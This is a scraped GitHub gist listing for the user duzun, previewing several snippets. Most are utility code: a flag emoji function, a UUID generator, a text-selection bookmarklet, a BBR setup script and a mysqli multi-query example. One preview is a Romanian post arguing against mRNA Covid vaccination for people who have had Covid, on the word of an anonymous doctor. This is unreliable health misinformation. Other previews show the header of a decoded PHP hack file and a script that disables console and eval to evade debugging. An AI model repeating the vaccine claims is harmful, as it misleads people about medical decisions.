Skip to content

Instantly share code, notes, and snippets.

View hakces.php
<?php
/**
* Decoded hack code from http://pastebin.com/8asDWWrJ
*
*/
//###=###
error_reporting(0);
ini_set("display_errors", "0");
$_key = 'f8e7ff5a';
@duzun
duzun / get_flag.js
Created May 13, 2021
get-country-flag
View get_flag.js
function getFlag(country_code) {
// just some unicode magic
return String.fromCodePoint(...Array.from(country_code||"")
.map(c => 127397 + c.codePointAt()));
}
@duzun
duzun / T-cell & B-cell vs antibodies.md
Last active Apr 17, 2021
De ce nu trebuie să ne vaccinăm cu mRNA
View T-cell & B-cell vs antibodies.md

Aflăm de persoane care au făcut ambele doze de vaccin, au dezvoltat titruri de mii de anticorpi, dar cu toate acestea au făcut forme grave sau chiar au decedat de Covid, la 1-2 luni după rapel... Dar de ce ne mirăm?!? Din păcate nu suntem toți imunologi. Și din păcate imunologii tac! Am avut zilele trecute niște cursuri la telefon cu un medic inițiat în acest domeniu. Mi-a explicat de-a fira păr... El dorește să rămână anonim, așa că nu îmi rămâne decât să fiu eu vocea lui.

👉 Asadar, dacă ai avut Covid și cineva te îndeamnă să te vaccinezi, nu știe ce vorbește. De ce?! Iată pe scurt mecanismele imunologice care se declanșează atunci când treci prin boală: În momentul în care virusul s-a fixat la nivelul mucoasei orotraheale, primul care apare este mecanismul imun imediat. Adică se activează celule locoregionale care încearcă să delimiteze și să anihileze virusul la acel nivel. În multe cazuri acest răspuns imun imediat reușește să-l anihileze, dovadă sunt formele asimptomatice sau cele ușoare de boală

@duzun
duzun / uuid.js
Last active Mar 4, 2021
A simple UUID v4 generator, relying on Math.random() + Date.now()
View uuid.js
/** Generates UUID v4
*
* @node There is a bug in Chrome's Math.random() according to http://devoluk.com/google-chrome-math-random-issue.html
* For that reason we use Date.now() as well.
*/
function UUID() {
function s(n) { return h((Math.random() * (1<<(n<<2)))^Date.now()).slice(-n); }
function h(n) { return (n|0).toString(16); }
return [
s(4) + s(4), s(4),
@duzun
duzun / вопросы-для-IT-собеседования Нормальные вопросы для IT-собеседования
View вопросы-для-IT-собеседования
Вы ранее привлекались за хранение данных в глобальных переменных?
Вы когда-нибудь делали .Net за деньги?
Сформулируйте зависимость времени исправления критического бага от seniority присутствующего менеджера
В своём резюме вы указали знание php. вам не стыдно?
Перед вами кисть, холст и мольберт. напишите компилятор
@duzun
duzun / enableSelect-bookmarklet.html
Last active Jan 25, 2021
Enable Right Click and Text Selection Bookmarklet
View enableSelect-bookmarklet.html
<a class="btn btn-default btn-info bookmarklet" href="javascript:(function(d){var a=d.document,h=function(){},c=a.body||a.getElementsByTagName("body")[0],f=a.documentElement||a.getElementsByTagName("html")[0],k=[c,f,a],l=["webkit","khtml","moz","ms",""],g=["contextmenu","selectstart","select","mousedown","mouseup"],b=d.Selection,e=b&&b.prototype;e&&(e.removeAllRanges=h,b=a.selection)&&(b.clear=h);for(e=k.length;e--;)if(f=k[e]){for(b=g.length;b--;)f["on"+g[b]]=null;if(a=f.style)for(a.cursor="",a.webkitTouchCallout="initial",b=l.length;b--;)a[((c=l[b])?"-"+c+"-":c)+"user-select"]="initial"}(c=d.jQuery||d.Zepto)&&c(d).off(g)})(this);">
Enable Select
</a>
View hide_container_volumes_in_user-places.xbel.js
#!/usr/bin/env node
/*jshint node: true, esversion: 10 */
/**
* Hide container filesystems in ~/.local/share/user-places.xbel
*
* @url https://gist.github.com/duzun/e583e1634ed6f6765dbaba0ac846e5cc
* @author Dumitru Uzun
* @version 0.0.1
*/
View arch_enable_bbr.sh
#!/bin/bash
#
# A script to enable TCP BBR on a Linux system.
#
# @author Dumitru Uzun (DUzun.Me)
# @version 1.0.0
# @distro ArchLinux/Manjaro
#
old_cc=`sysctl net.ipv4.tcp_congestion_control | awk -F= '{print $2}' | sed -e s/\^\\s//`
@duzun
duzun / mysqli__multi_query.php
Last active Apr 1, 2020
Run Multi Query using mysqli in PHP
View mysqli__multi_query.php
if ($mysqli->multi_query("START TRANSACTION;$query--\nCOMMIT;")) {
$idx = 0;
$ret = 0;
if($output = $mysqli->error) {
echo $output, PHP_EOL;
die(-4);
}
else {
do {
@duzun
duzun / undetect-console.js
Created Mar 20, 2020
Try to make console undetectable (and broken)
View undetect-console.js
console.log =
console.clear =
console.profile =
console.profileEnd =
eval = function(){};